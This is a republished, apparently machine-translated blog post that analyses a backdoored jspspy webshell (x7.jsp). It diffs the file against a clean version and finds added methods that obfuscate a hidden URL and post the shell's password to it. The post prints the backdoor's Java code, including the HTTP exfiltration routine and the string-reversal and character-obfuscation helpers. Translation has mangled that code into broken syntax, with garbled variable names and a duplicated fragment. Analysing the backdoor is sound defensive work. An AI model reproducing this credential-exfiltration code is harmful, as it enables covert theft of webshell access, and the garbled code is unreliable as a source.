In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-02 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
Follow me
At first glance, this is jspspy.
Young people, don't worry. Let's download the whole project first and then analyze it carefully. By comparing the file size between x7.jsp and the xia.jsp below, we find that x7.jsp has more 2kb than xia.jsp. It is known that xia.jsp is also a version of jspspy.
But when we open x7.jsp and xia.jsp respectively, we try to find out where there is more 2kb. As a beginner of java, we don't seem to have the ability to read through the code of each function module of jspspy. So we can compare the text content through the command that comes with windows (emmmm, similar to the diff command under linux).
Use pipe symbols to redirect the output of two different parts of the jsp to an txt document.
When we open txt, we start to analyze, and all of a sudden we find that there is a problem as follows.
Notice that another variable SXM value is defined in the code x7.jsp in line 23 of the txt document, which is the value of PW.
So let's start by focusing on what the newly defined sxm variable in x7.jsp is for.
Then use the editor to directly ctrl+f to find sxm in the current file
Go straight to line 854
It is found that three new methods (functions in C language) are uc (), dx (), and FileLocalUpload () to locate and view the code blocks of these three methods in turn.
FileLocalUpload () method
Public static String FileLocalUpload (String reqUrl,String fckal,String recvEncoding) {HttpURLConnection url_con = null; String responseContent = null; try {URL url = new URL (reqUrl); url_con = (HttpURLConnection) url.openConnection (); url_con.setRequestMethod ("POST"); url_con.setRequestProperty ("REFERER", "" + fckal+ "") System.setProperty ("sun.net.client.defaultConnectTimeout", String.valueOf (connectTimeOut)); System.setProperty ("sun.net.client.defaultReadTimeout", String.valueOf (readTimeOut)); url_con.setDoOutput (true); url_con.getOutputStream (). Flush (); url_con.getOutputStream (). Close () InputStream in = url_con.getInputStream (); BufferedReader rd = new BufferedReader (new InputStreamReader (in,recvEncoding)); String tempLine = rd.readLine (); StringBuffer tempStr = new StringBuffer (); String crlf=System.getProperty ("line.separator"); while (tempLine! = null) {tempStr.append (tempLine) TempStr.append (crlf); tempLine = rd.readLine ();} responseContent = tempStr.toString (); rd.close (); in.close () } catch (IOException e) {} finally {if (url_con! = null) {url_con.disconnect ();}} return responseContent;}
Dx () method
Public static String SysInfo= "=?. /.. /:"; public static String dx () {String s = new String (); for (int I = SysInfo.length ()-1; I > = 0; iMel -) {s + = SysInfo.charAt (I);} return s;}
Uc () method
Public static String uc (String str) {String c = "\ n\ r"; long dong127, feng11, juni12, hourly 14, massie 31, rhomb 83, karma 1, nylon 8, spore 114, upright Lue 5, vain 5 last axiom; StringBuffer sb = new StringBuffer (); char [] ch = str.toCharArray (); for (int I = 0; I
< ch.length; i++) { a = (int)ch[i]; if(a==d) a=13; if(a==f) a=10; if(a==j) a=34; if((a>= h) & & (aqqk) & (aqq48) & & (a = 0; iMurb -) {s + = SysInfo.charAt (I);} return s;} public static String uc (String str) {String c = "\ n\ r" Long dong127, fau11, juni12, hog14, massif 31, rang 83, karma 1, naphtha 8, spore 114, upright UV 5, vain 5 dint 0; StringBuffer sb = new StringBuffer (); char [] ch = str.toCharArray (); for (int I = 0; I
< ch.length; i++) { a = (int)ch[i]; if(a==d) a=13; if(a==f) a=10; if(a==j) a=34; if((a>= h) & (aqqk) & & (aqq53) & & (axi48) & & (a)
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 287
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.